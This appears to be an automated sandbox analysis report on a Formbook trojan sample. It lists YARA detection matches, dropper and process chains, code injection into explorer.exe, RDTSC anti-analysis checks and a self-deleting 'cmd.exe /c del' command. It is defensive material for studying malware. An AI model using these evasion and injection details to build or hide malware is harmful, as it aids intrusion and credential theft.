Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: kmhbvf.exe PID: 4820, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: kmhbvf.exe PID: 5280, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 2304, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F35778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 1_2_00F35778
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: String function: 00EF8B30 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: String function: 00EE1A36 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: String function: 00EF0D17 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: String function: 00EF9FA5 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: String function: 00EE1CB6 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: String function: 00F01B70 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041A360 NtCreateFile, 2_2_0041A360
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041A410 NtReadFile, 2_2_0041A410
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041A490 NtClose, 2_2_0041A490
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041A540 NtAllocateVirtualMemory, 2_2_0041A540
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041A35B NtCreateFile, 2_2_0041A35B
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041A40A NtReadFile, 2_2_0041A40A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041A48B NtClose, 2_2_0041A48B
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F342D5: CreateFileW,DeviceIoControl,CloseHandle, 1_2_00F342D5
Source: shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs shedfam.exe
Source: shedfam.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@9/5@3/2
Source: C:\Users\user\Desktop\shedfam.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3A6AD GetLastError,FormatMessageW, 1_2_00F3A6AD
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 1_2_00F3443D
Source: C:\Users\user\Desktop\shedfam.exe File read: C:\Users\user\Desktop\shedfam.exe
Source: C:\Users\user\Desktop\shedfam.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\shedfam.exe C:\Users\user\Desktop\shedfam.exe
Source: C:\Users\user\Desktop\shedfam.exe Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\shedfam.exe Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"
Source: C:\Users\user\Desktop\shedfam.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F28DE9 AdjustTokenPrivileges,CloseHandle, 1_2_00F28DE9
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F29399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 1_2_00F29399
Source: C:\Users\user\Desktop\shedfam.exe File created: C:\Users\user\AppData\Local\Temp\nse13E8.tmp
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar, 0_2_00402036
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004043F5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F34148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 1_2_00F34148
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Binary string: netstat.pdbGCTL source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netstat.pdb source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF8B75 push ecx; ret 1_2_00EF8B88
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041693E push ebp; ret 2_2_0041693F
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0040D308 push FFFFFF90h; iretd 2_2_0040D30D
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041D4B5 push eax; ret 2_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041D56C push eax; ret 2_2_0041D572
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041D502 push eax; ret 2_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041D50B push eax; ret 2_2_0041D572
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EF8B75 push ecx; ret 2_2_00EF8B88
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F4C6D9 LoadLibraryA,GetProcAddress, 1_2_00F4C6D9
Source: C:\Users\user\Desktop\shedfam.exe File created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE7
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F559B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_00F559B3
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_00EE5EDA
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 2_2_00EE5EDA
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF33B7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00EF33B7
Source: C:\Users\user\Desktop\shedfam.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000002F19904 second address: 0000000002F1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000002F19B7E second address: 0000000002F19B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Windows\explorer.exe TID: 6016 Thread sleep time: -32000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 5356 Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe API coverage: 4.3 %
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe API coverage: 1.4 %
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00409AB0 rdtsc 2_2_00409AB0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\shedfam.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
